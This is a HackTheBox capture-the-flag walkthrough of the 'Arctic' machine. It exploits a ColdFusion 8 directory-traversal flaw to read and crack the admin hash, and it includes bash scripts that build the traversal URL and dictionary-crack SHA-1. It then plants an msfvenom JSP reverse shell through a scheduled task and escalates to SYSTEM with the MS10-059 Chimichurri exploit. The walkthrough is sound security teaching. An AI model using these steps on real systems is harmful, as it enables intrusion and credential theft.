Arctic - HackTheBox Writeup


The link for this machine is located here: https://app.hackthebox.com/machines/9


This machine runs a vulnerable Adobe ColdFusion 8 install, which we exploit to gain a reverse shell. We then escalate to SYSTEM with the MS10-059 (Tracing Feature for Services) privilege escalation exploit, Chimichurri.exe.


Full Walkthrough

First, we run an Nmap scan to identify open ports, with the following parameters:

  • -Pn to skip the initial ping (host discovery) and treat the host as up

  • 10.10.10.11 as the target IP

  • -oN default.scan to save normal-format output to a file

This returns three open ports: 135, 8500 and 49154. Knowing these, we can run a more detailed service and version scan against just those three ports to learn more about what is listening.

Still not a lot comes back. For port 8500 we can look up what commonly runs on it:

The usual suspect is Adobe ColdFusion, i.e. a web application server, which seems the most relevant for a CTF box (the other registered use, a Duke Nukem 3D server, seems unlikely, but who knows?). Let's solve the mystery by opening the port in a browser.

This reveals a directory index with two entries: CFIDE and cfdocs. A little research on CFIDE confirms that it is the ColdFusion administrator and utility directory.

Additionally, the same research shows that the default location of the Administrator login page is /CFIDE/administrator. To check whether it exists, we navigate into the CFIDE directory and look for /administrator.

The CFIDE/administrator directory does exist. Clicking the administrator link takes us to the login panel.

The username is pre-filled and cannot be changed, so only the password is unknown. We could brute-force it or try default passwords, but that is noisy and best kept as a last resort.

Instead, since the login page shows the version (ColdFusion 8) at the top, we first look for public exploits against that version.

Many results come back, including RCE and arbitrary file upload exploits. The one that stands out as more passive, and less likely to crash the service, is the directory traversal exploit (CVE-2010-2861).

It works by traversing from the web root up to the ColdFusion8 installation directory and reading lib/password.properties, the file that stores the administrator password hash.

Let’s try it and see if it works.

Bingo! It works: the contents of password.properties, including the password hash, are rendered into the login page, so we can copy the hash and try to crack it.

To identify the hash type, we can use a tool like hash-identifier and paste in the hash.

This identifies it as SHA-1 (ColdFusion 8 stores the admin password as an unsalted SHA-1 hex digest). We copy the hash to a local Windows host with a GPU and run Hashcat in SHA-1 mode (-m 100) against the rockyou.txt wordlist.

Almost immediately we get a cleartext result for the hash: happyday.
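The traversal-to-crack chain above, as an added example that is not code from the original writeup: a bash script that builds the traversal request, pulls the hash out of a returned password.properties, and dictionary-attacks it as plain SHA-1. It assumes the public CVE-2010-2861 payload (the locale parameter of /CFIDE/administrator/enter.cfm, with a %00 to cut off the suffix ColdFusion appends), a password.properties layout with a password= line, and a constructed wordlist; the hash is computed here from the password the box uses rather than copied from the real file.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup. Builds the ColdFusion 8
# directory-traversal request (CVE-2010-2861, "locale" parameter of
# enter.cfm, assumed public payload), extracts the admin hash from the
# returned password.properties, and dictionary-attacks it as plain SHA-1.
# The properties body and wordlist below are constructed for the demo.

# Traversal URL that reads lib/password.properties from the CF8 install.
# The trailing %00 truncates the suffix ColdFusion appends to the locale.
cf_traversal_url() {
    local base="$1"   # e.g. http://10.10.10.11:8500
    printf '%s/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%%00en\n' "$base"
}

# Lower-case SHA-1 hex digest of a string (no newline is hashed).
sha1hex() {
    if command -v sha1sum >/dev/null 2>&1; then
        printf '%s' "$1" | sha1sum | cut -d' ' -f1
    else
        printf '%s' "$1" | shasum -a 1 | cut -d' ' -f1
    fi
}

# Pull the value of the "password=" line out of a password.properties body.
# CF8 stores an unsalted SHA-1 hex digest, so insist on 40 hex characters
# before spending any cracking time on it; return 1 otherwise.
extract_hash() {
    local h
    h=$(printf '%s\n' "$1" | sed -n 's/^password=\([0-9A-Fa-f]*\).*/\1/p' | head -n1)
    [ "${#h}" -eq 40 ] || return 1
    printf '%s\n' "$h"
}

# Dictionary attack: hash each wordlist entry and compare case-insensitively.
# Prints the plaintext and returns 0 on a hit, 1 if the list is exhausted.
crack_sha1() {
    local target w
    target=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    while IFS= read -r w || [ -n "$w" ]; do
        if [ "$(sha1hex "$w")" = "$target" ]; then
            printf '%s\n' "$w"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed demo data: the hash is computed here from the password the box
# uses (happyday) rather than copied from the real file on the target.
DEMO_HASH=$(sha1hex happyday | tr 'a-z' 'A-Z')
DEMO_PROPERTIES="#constructed sample, not the real password.properties
password=${DEMO_HASH}
encrypted=true"

# End-to-end run over a small constructed wordlist; prints the recovered password.
demo_crack() {
    local list hash
    list=$(mktemp)
    printf '%s\n' password 123456 letmein happyday qwerty > "$list"
    hash=$(extract_hash "$DEMO_PROPERTIES") || { rm -f "$list"; return 1; }
    crack_sha1 "$hash" "$list"
    rm -f "$list"
}

cf_traversal_url http://10.10.10.11:8500
demo_crack
```

The 40-hex-character check in extract_hash is the step worth keeping in a real engagement: the traversal returns the whole properties file wrapped in the login page's HTML, and grabbing the wrong line sends the GPU off cracking a string that was never a hash.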

With this password, we can log in to the Administrator panel.

We are taken to the home page. I have no idea what ColdFusion is or what functionality it provides, so it's time to do some research on potentially gaining a shell through it.

I stumbled upon this page which lays out the steps quite nicely - and is also a good read!

Following these steps, we go to the left-hand menu and click on the Mappings section.

There we find the filesystem path that the /CFIDE web directory maps to; this is where we will have the server write our shell so that it is reachable over HTTP.

With this path noted, we go to the Scheduled Tasks section under Debugging & Logging.

Here we fill in a Task Name, the URL and the File. The Task Name can be anything; the URL must point at our Linux machine, where we will host the malicious JSP file; and the File is the full path under the CFIDE directory found above where the fetched content will be written (the task's save-output-to-file option must be enabled, or nothing is written).

Before submitting the task, we generate a JSP reverse shell with MSFvenom (payload java/jsp_shell_reverse_tcp), setting LHOST to our IP and LPORT to the port our listener will use.

Once generated, we host it with a Python web server (python3 -m http.server) from the directory containing the file.

With everything in place, we submit the task and it appears in the Scheduled Tasks table. The green button on the far left of the row runs the task on demand.

Clicking it and waiting a moment, we see the task completed successfully.

Looking back at our Python web server, we see a request for shell.jsp from the target IP.

Now, back in the /CFIDE directory index we saw earlier, the malicious file should be listed under the name given in the File field rather than the name it was fetched as: in my case Rev-Shell-Time.jsp.

Before we request it, we start a Netcat listener (nc -lvnp 443) on port 443 to catch the reverse shell.

Then we browse to the JSP file to execute it, and a CMD prompt pops up in our Netcat listener.

From here, we navigate to the Desktop of the tolis user and grab the user flag for submission.

Next, we can perform some post-exploitation enumeration to try and find any privilege escalation vectors we can exploit.

The first thing I run is the systeminfo command to gather information about the host.

This reveals some important details: the OS is an old one (Windows Server 2008 R2 Standard) and the system is 64-bit, which matters when choosing a compiled exploit.

With an OS this old, a tool like Windows Exploit Suggester can match the patch level against known privilege escalation bulletins. First, we clone the GitHub repository.

Then, before running it, we update its bulletin database (--update), which downloads the Microsoft security bulletin spreadsheet:

To run it we need a text file containing the output of the systeminfo command from earlier. With that saved, we run the script, passing the database file created in the previous step and the systeminfo text file.
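As an added example, not code from the original writeup or from the Windows Exploit Suggester project: a bash helper that checks the copied systeminfo output has the lines the suggester parses, extracts OS name, version and architecture, lists installed hotfixes, and checks whether the MS10-059 update (KB982799) is already present before we commit to that exploit. The two systeminfo texts are constructed to resemble the box's output: the OS name and architecture match the page, while the build number and the hotfix in the second sample are assumed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup or the Windows Exploit
# Suggester project. Checks a systeminfo dump has the lines the suggester
# parses, extracts the fields that drive its verdict, and checks whether the
# MS10-059 update (KB982799) is already installed before we pick that exploit.
# The two systeminfo texts below are constructed: OS name and architecture
# match the box, the build number and the hotfix in the second sample are
# assumed for the demo.
#
# The suggester itself (assumed cloned into the current directory) is run as:
#   ./windows-exploit-suggester.py --update
#   ./windows-exploit-suggester.py --database <YYYY-MM-DD-mssb.xls> --systeminfo systeminfo.txt

# Value of the first "Key:   value" line. Trailing whitespace, including the
# CR left over from Windows line endings, is stripped.
si_field() {            # si_field "OS Version" "$text"
    printf '%s\n' "$2" | sed -n "s/^$1:[[:space:]]*//p" | head -n1 | sed 's/[[:space:]]*$//'
}

# Architecture from the "System Type" line: decides which exploit build to grab.
si_arch() {
    case "$(si_field 'System Type' "$1")" in
        x64*|X64*) echo x64 ;;
        x86*|X86*) echo x86 ;;
        *) return 1 ;;
    esac
}

# Installed hotfix KB numbers, one per line (empty when the dump says N/A).
# The KB lines sit between "Hotfix(s):" and the next top-level key.
si_hotfixes() {
    printf '%s\n' "$1" | sed -n '/^Hotfix(s):/,/^[A-Za-z]/p' | grep -oE 'KB[0-9]+' || true
}

# 0 if the given KB is listed as installed, 1 otherwise.
si_has_kb() {           # si_has_kb "$text" KB982799
    si_hotfixes "$1" | grep -qx "$2"
}

# Refuse to feed the suggester a dump that is missing the lines it keys on.
si_check() {
    local key
    for key in 'OS Name' 'OS Version' 'System Type' 'Hotfix(s)'; do
        [ -n "$(si_field "$key" "$1")" ] || { echo "systeminfo dump is missing '$key'" >&2; return 1; }
    done
}

# MS10-059 applies to the NT 6.0/6.1 family (Vista/2008 and 7/2008 R2) and is
# closed by KB982799: 0 if the host looks like a candidate, 1 otherwise.
ms10_059_candidate() {
    local ver
    ver=$(si_field 'OS Version' "$1")
    case "$ver" in
        6.0.*|6.1.*) ;;
        *) return 1 ;;
    esac
    ! si_has_kb "$1" KB982799
}

# Constructed sample resembling the box (no hotfixes reported).
SAMPLE_UNPATCHED='Host Name:                 TARGET
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.'

# Constructed sample of the same host with the MS10-059 update present.
SAMPLE_PATCHED='Host Name:                 TARGET
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB982799
Network Card(s):           1 NIC(s) Installed.'

si_check "$SAMPLE_UNPATCHED" && ms10_059_candidate "$SAMPLE_UNPATCHED" \
    && echo "MS10-059 candidate: $(si_field 'OS Name' "$SAMPLE_UNPATCHED") ($(si_arch "$SAMPLE_UNPATCHED"))"
```

Run si_check against the real systeminfo.txt before invoking the suggester; a dump truncated by a flaky reverse shell silently produces an empty or misleading result set, and the KB check is what separates "bulletin applies to this OS version" from "this host is actually still vulnerable".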

This returns a lot of results. However, 4 stood out to me as they can potentially elevate our privileges.

Three of these are Windows kernel exploits, which I want to avoid if possible as they are the most likely to crash the system. One stands out, though: the Tracing Feature for Services vulnerability, MS10-059.

Researching this bulletin turns up a GitHub repository for an exploit called Chimichurri.

In that repository we find a precompiled EXE for the MS10-059 privilege escalation exploit.

We download it and host it from our machine over SMB (for example with Impacket's smbserver.py) in a share called share.

Once hosted, from the target's shell we connect to the share with the net use command and copy Chimichurri.exe to a writable directory (I chose C:\ProgramData).

Then, before execution, we start another Netcat listener on port 443.

Finally, the GitHub README tells us how to run it: we simply specify the IP address and port the SYSTEM shell should connect back to.

After execution, we get a SYSTEM-level shell on our Netcat listener!

Finally, to complete the box, we navigate to the Administrator's desktop and grab the root flag for submission.


Previous: Bastard - HackTheBox Writeup

Next: Access - HackTheBox Writeup